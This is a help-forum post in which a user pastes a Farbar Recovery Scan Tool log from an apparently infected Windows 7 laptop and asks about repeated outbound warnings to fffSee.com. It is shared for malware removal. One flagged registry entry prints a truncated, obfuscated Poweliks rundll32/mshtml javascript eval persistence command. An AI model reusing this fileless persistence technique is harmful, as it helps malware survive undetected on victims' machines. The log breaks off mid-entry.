Running MWB Premium. Getting continuous notifications regrading fffSee.com outbound. I Ran FRST. Here is FRST.txt: Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014Ran by Patrick (administrator) on PATRICK_LAPTOP on 05-11-2014 10:47:27Running from C:\Users\Patrick\DesktopLoaded Profile: Patrick (Available profiles: Patrick)Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)Internet Explorer Version 11Boot Mode: Safe Mode (with Networking)Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe(Microsoft Corporation) C:\Windows\System32\dllhost.exe(Microsoft Corporation) C:\Program Files\Windows Media Player\wmpnscfg.exe(Microsoft Corporation) C:\Program Files\Windows Media Player\wmpnscfg.exe(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [MfeEpePcMonitor] => C:\Program Files\Hewlett-Packard\Drive Encryption\EpePcMonitor.exe [200704 2013-02-01] ()HKLM\...\Run: [sysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1664000 2013-01-23] (IDT, Inc.)HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [558496 2014-02-27] (Adobe Systems Incorporated)HKLM\...\Run: [HPPowerAssistant] => C:\Program Files\Hewlett-Packard\HP Power Assistant\HPPA_Main.exe [3488640 2012-03-14] (Hewlett-Packard Company)HKLM\...\Run: [Hightail Sync Agent] => C:\Program Files (x86)\Hightail Desktop App\Hightail.exe [7107640 2014-02-25] (Hightail, Inc.)HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2816240 2014-07-03] (Synaptics Incorporated)HKLM-x32\...\Run: [File Sanitizer] => c:\Program Files (x86)\Hewlett-Packard\File Sanitizer\CoreShredder.exe [12277248 2011-05-09] (Hewlett-Packard)HKLM-x32\...\Run: [iMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [112408 2013-01-23] (Intel Corporation)HKLM-x32\...\Run: [iAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [283160 2011-01-26] (Intel Corporation)HKLM-x32\...\Run: [NUSB3MON] => c:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe [113288 2010-11-17] (Renesas Electronics Corporation)HKLM-x32\...\Run: [iFXSPMGT] => c:\Program Files (x86)\Hewlett-Packard\Embedded Security Software\ifxspmgt.exe [1125728 2011-01-20] (Infineon Technologies AG)HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)HKLM-x32\...\Run: [HPQuickWebProxy] => C:\Program Files (x86)\Hewlett-Packard\HP QuickWeb\hpqwutils.exe [169528 2013-01-23] (Hewlett-Packard Company)HKLM-x32\...\Run: [HPConnectionManager] => C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\HPCMDelayStart.exe [103992 2011-05-23] (Hewlett-Packard Development Company L.P.)HKLM-x32\...\Run: [] => [X]HKLM-x32\...\Run: [QLBController] => C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\QLBController.exe [334240 2012-09-12] (Hewlett-Packard Company)HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [658424 2011-08-11] (PDF Complete Inc)HKLM-x32\...\Run: [Desktop Disc Tool] => C:\Program Files (x86)\Roxio\Roxio Burn\RoxioBurnLauncher.exe [522736 2011-04-18] ()HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Acrotray.exe [3499920 2014-09-12] (Adobe Systems Inc.)HKLM-x32\...\Run: [RIMBBLaunchAgent.exe] => C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe [443408 2013-09-09] (Research In Motion Limited)HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766208 2013-09-11] (Advanced Micro Devices, Inc.)HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard)HKLM\...\Winlogon: [userinit] C:\Windows\system32\userinit.exe,C:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DPAgent.exe,Winlogon\Notify\DeviceNP-x32: DeviceNP.dll [X]HKU\S-1-5-21-1992431398-1666005040-1435792247-1001\...\Run: [LightScribe Control Panel] => C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe [2736128 2010-05-19] (Hewlett-Packard Company)HKU\S-1-5-21-1992431398-1666005040-1435792247-1001\...\Run: [Akamai NetSession Interface] => C:\Users\Patrick\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)HKU\S-1-5-21-1992431398-1666005040-1435792247-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2013-07-12] (Google Inc.)HKU\S-1-5-21-1992431398-1666005040-1435792247-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2013-04-22] (Microsoft Corporation)HKU\S-1-5-21-1992431398-1666005040-1435792247-1001\...\Run: [Push Client] => C:\Users\Patrick\AppData\Local\ATT Connect\Participant\pull.exe [983296 2013-11-12] (AT&T Inc.)HKU\S-1-5-21-1992431398-1666005040-1435792247-1001\...\MountPoints2: D - D:\VZW_Software_upgrade_assistant.exeHKU\S-1-5-21-1992431398-1666005040-1435792247-1001\...\MountPoints2: {d726caa6-12d3-11e4-bff1-402cf4c4d9f1} - D:\VZW_Software_upgrade_assistant.exeHKU\S-1-5-21-1992431398-1666005040-1435792247-1001\...\MountPoints2: {e53c125f-55a9-11e3-81bd-402cf4c4d9f1} - D:\VZW_Software_upgrade_assistant.exeHKU\S-1-5-21-1992431398-1666005040-1435792247-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!HKU\S-1-5-18\...\Run: [LightScribe Control Panel] => C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe [2736128 2010-05-19] (Hewlett-Packard Company)Lsa: [Notification Packages] EpePcNp64 DPPassFilter scecliStartup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnkShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SDL MultiTerm 2011 Widget.lnkShortcutTarget: SDL MultiTerm 2011 Widget.lnk -> C:\Program Files (x86)\SDL\SDL MultiTerm\MultiTerm9\MultiTerm Widget.exe (SDL)Startup: C:\Users\Patrick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Verizon Wireless Software Utility Application for Android – Samsung.lnkShortcutTarget: Verizon Wireless Software Utility Application for Android – Samsung.lnk -> C:\Users\Patrick\AppData\Roaming\VERIZON\UA_ar\UA.exe (SAMSUNG Electornics Co., Ltd.)ShellIconOverlayIdentifiers: [00001YSISyncComplete] -> {89B5F9CC-C4A2-462C-BD27-29CEAC972135} => C:\Program Files\Hightail Desktop App\YSINSE64.dll (Hightail, Inc.)ShellIconOverlayIdentifiers: [00002YSISyncActive] -> {84B7BDFB-C50A-4335-B7C2-8AEC454F9E25} => C:\Program Files\Hightail Desktop App\YSINSE64.dll (Hightail, Inc.)ShellIconOverlayIdentifiers: [00003YSISyncError] -> {306A9CDE-AC70-453A-8008-B5F9962B8F88} => C:\Program Files\Hightail Desktop App\YSINSE64.dll (Hightail, Inc.)ShellIconOverlayIdentifiers: [00004YSILocalOnly] -> {23A7D2DC-F395-4E33-876C-84A2DFAB0EBB} => C:\Program Files\Hightail Desktop App\YSINSE64.dll (Hightail, Inc.)ShellIconOverlayIdentifiers-x32: [00001YSISyncComplete] -> {89B5F9CC-C4A2-462C-BD27-29CEAC972135} => C:\Program Files (x86)\Hightail Desktop App\YSINSE.dll (Hightail, Inc.)ShellIconOverlayIdentifiers-x32: [00002YSISyncActive] -> {84B7BDFB-C50A-4335-B7C2-8AEC454F9E25} => C:\Program Files (x86)\Hightail Desktop App\YSINSE.dll (Hightail, Inc.)ShellIconOverlayIdentifiers-x32: [00003YSISyncError] -> {306A9CDE-AC70-453A-8008-B5F9962B8F88} => C:\Program Files (x86)\Hightail Desktop App\YSINSE.dll (Hightail, Inc.)ShellIconOverlayIdentifiers-x32: [00004YSILocalOnly] -> {23A7D2DC-F395-4E33-876C-84A2DFAB0EBB} => C:\Program Files (x86)\Hightail Desktop App\YSINSE.dll (Hightail, Inc.) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPCOM/1HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://www.nytimes.com/SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDFSearchScopes: HKLM - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDFSearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDFSearchScopes: HKLM-x32 - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDFSearchScopes: HKCU - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDFSearchScopes: HKCU - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDFBHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll (Adobe Systems Incorporated)BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll (Adobe Systems Incorporated)BHO-x32: File Sanitizer for HP ProtectTools -> {3134413B-49B4-425C-98A5-893C1F195601} -> c:\Program Files (x86)\Hewlett-Packard\File Sanitizer\IEBHO.dll (Hewlett-Packard)BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll (Adobe Systems Incorporated)Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)Toolbar: HKCU - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll (Adobe Systems Incorporated)Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T28L10NSP10EP1-16277/event/ieatgpc1.cabTcpip\Parameters: [DhcpNameServer] 24.92.226.11 24.92.226.12Tcpip\..\Interfaces\{E96F5685-C65F-4776-A433-E6FD5A090BE9}: [NameServer] 24.92.226.11,24.92.226.12 FireFox:========FF Plugin: @microsoft.com/GENUINE -> disabled No FileFF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)FF Plugin-x32: @FortinetCacheClean -> C:\Program Files (x86)\Fortinet\SslvpnClient\npccplugin.dll (Fortinet Inc.)FF Plugin-x32: @FortinetTunnelControl -> C:\Program Files (x86)\Fortinet\SslvpnClient\nptcplugin.dll (Fortinet Inc.)FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)FF Plugin-x32: @microsoft.com/GENUINE -> disabled No FileFF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)FF Plugin-x32: @rim.com/npappworld -> C:\Program Files (x86)\Research In Motion Limited\BlackBerry App World Browser Plugin\npappworld.dll ()FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll ()FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Patrick\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)FF HKLM-x32\...\Firefox\Extensions: [otis@digitalpersona.com] - C:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\FirefoxExtFF Extension: DigitalPersona Extension - C:\Program Files (x86)\Hewlett-Packard\HP ProtectTools Security Manager\Bin\FirefoxExt [2013-01-23]FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtnFF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2013-01-27] Chrome: =======CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\PepperFlash\pepflashplayer.dll No FileCHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewerCHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\ppGoogleNaClPluginChrome.dll No FileCHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\34.0.1847.131\pdf.dll No FileCHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll No FileCHR Plugin: (Bing Bar) - C:\Program Files (x86)\MSN Toolbar\Platform\6.0.2282.0\npwinext.dll No FileCHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrl.dll No FileCHR Profile: C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\DefaultCHR Extension: (Adobe Acrobat - Create PDF) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2013-07-12]CHR Extension: (Google Wallet) - C:\Users\Patrick\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-29]CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2014-09-12] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 BlackBerry Device Manager; C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe [585728 2013-09-09] (Research In Motion Limited) [File not signed]S2 DpHost; C:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\Bin\DpHostW.exe [486224 2011-11-10] (DigitalPersona, Inc.)S3 FLCDLOCK; c:\Windows\SysWOW64\flcdlock.exe [464480 2011-02-03] (Hewlett-Packard Company)S2 FortiSslvpnDaemon; C:\windows\SysWOW64\FortiSSLVPNdaemon.exe [866920 2012-02-07] (Fortinet Inc.)S2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]S2 HPFSService; C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\HPFSService.exe [320512 2011-05-09] (Hewlett-Packard) [File not signed]S2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\HpHotkeyMonitor.exe [523680 2012-09-12] (Hewlett-Packard Company)S2 IFXSpMgtSrv; c:\Program Files (x86)\Hewlett-Packard\Embedded Security Software\ifxspmgt.exe [1125728 2011-01-20] (Infineon Technologies AG)S2 IFXTCS; c:\Program Files (x86)\Hewlett-Packard\Embedded Security Software\ifxtcs.exe [980320 2011-01-19] (Infineon Technologies AG)S2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2010-05-19] (Hewlett-Packard Company) [File not signed]S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)S2 McAfee Endpoint Encryption Agent; C:\Program Files\Hewlett-Packard\Drive Encryption\EEAgent\MfeEpeHost.exe [1323008 2013-02-01] () [File not signed]R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)S2 NalServ; C:\windows\SysWOW64\nalserv.exe [147056 2014-04-10] (Nalpeiron Ltd.)S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)S2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1128952 2011-08-11] (PDF Complete Inc)S2 PersonalSecureDriveService; c:\Program Files (x86)\Hewlett-Packard\Embedded Security Software\IfxPsdSv.exe [203104 2011-01-20] (Infineon Technologies AG)S2 SCPwrSetSvr; C:\windows\system32\SCPwrSetSvr.exe [99096 2014-04-18] ()S2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [323072 2013-01-23] (IDT, Inc.) [File not signed]S2 uArcCapture; C:\windows\SysWow64\ArcVCapRender\uArcCapture.exe [498352 2013-01-23] (ArcSoft, Inc.) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 ARCVCAM; C:\Windows\System32\DRIVERS\ArcSoftVCapture.sys [42816 2013-01-23] (ArcSoft, Inc.)S3 DAMDrv; C:\Windows\System32\DRIVERS\DAMDrv64.sys [63336 2011-02-07] (Hewlett-Packard Company)R3 johci; C:\Windows\System32\DRIVERS\johci.sys [26208 2013-01-23] (JMicron Technology Corp.)S3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)S3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-05] (Malwarebytes Corporation)S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)R0 MfeEpeOpal; C:\Windows\System32\Drivers\MfeEpeOpal.sys [101288 2013-02-01] (McAfee, Inc.)R0 MfeEpePc; C:\Windows\System32\Drivers\MfeEpePc.sys [158888 2013-02-01] (McAfee, Inc.)S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)S2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)R1 PersonalSecureDrive; C:\Windows\System32\drivers\psd.sys [44576 2010-01-26] (Infineon Technologies AG)R3 pppop; C:\Windows\System32\DRIVERS\pppop64.sys [42528 2009-07-21] (Fortinet Inc.)S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [79872 2013-06-27] (Research In Motion Limited)S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44544 2012-12-10] (Research in Motion Ltd)S3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1866080 2012-11-28] ()S3 SzCCID; C:\Windows\System32\DRIVERS\SzCCID.sys [39936 2014-04-18] (Generic) ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-05 10:47 - 2014-11-05 10:47 - 00024053 _____ () C:\Users\Patrick\Desktop\FRST.txt2014-11-05 10:47 - 2014-11-05 10:47 - 00000000 ____D () C:\FRST2014-11-05 10:46 - 2014-11-05 10:46 - 00509984 _____ () C:\windows\Minidump\110514-34413-01.dmp2014-11-05 10:43 - 2014-11-05 10:43 - 05591672 _____ (Swearware) C:\Users\Patrick\Desktop\ComboFix.exe2014-11-05 10:42 - 2014-11-05 10:42 - 02114560 _____ (Farbar) C:\Users\Patrick\Desktop\FRST64.exe2014-11-05 10:42 - 2014-11-05 10:42 - 01375089 _____ () C:\Users\Patrick\Desktop\AdwCleaner.exe2014-11-05 10:03 - 2014-11-05 10:03 - 00003288 ____N () C:\bootsqm.dat2014-11-05 10:00 - 2014-11-05 10:00 - 00000000 __SHD () C:\found.0002014-11-05 08:34 - 2014-11-05 10:36 - 00129752 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys2014-11-05 08:33 - 2014-11-05 08:33 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-11-05 08:33 - 2014-11-05 08:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-11-05 08:33 - 2014-11-05 08:33 - 00000000 ____D () C:\ProgramData\Malwarebytes2014-11-05 08:33 - 2014-11-05 08:33 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware2014-11-05 08:33 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys2014-11-05 08:33 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys2014-11-05 08:33 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys2014-11-05 06:04 - 2014-11-05 09:18 - 00000000 ____D () C:\ProgramData\BotoCava2014-11-05 06:02 - 2014-11-05 09:18 - 00000000 ____D () C:\ProgramData\DeybAdca2014-11-05 01:53 - 2014-11-05 09:18 - 00000000 ____D () C:\ProgramData\VekezVikxo2014-11-04 19:37 - 2014-11-05 08:10 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage2014-10-21 09:50 - 2014-10-21 09:51 - 50837415 _____ () C:\Users\Patrick\Desktop\1.04_EM3_with_preserves.zip2014-10-21 09:45 - 2014-10-21 09:46 - 31726483 _____ () C:\Users\Patrick\Desktop\generic_update.zip2014-10-16 14:34 - 2014-10-16 14:45 - 00000000 ____D () C:\Users\Patrick\Desktop\LUX2014-10-15 08:11 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys2014-10-15 08:11 - 2014-08-18 22:11 - 00693176 _____ (Microsoft Corporation) C:\windows\system32\winload.efi2014-10-15 08:11 - 2014-08-18 22:10 - 00616352 _____ (Microsoft Corporation) C:\windows\system32\winresume.efi2014-10-15 08:11 - 2014-08-18 22:08 - 00503808 _____ (Microsoft 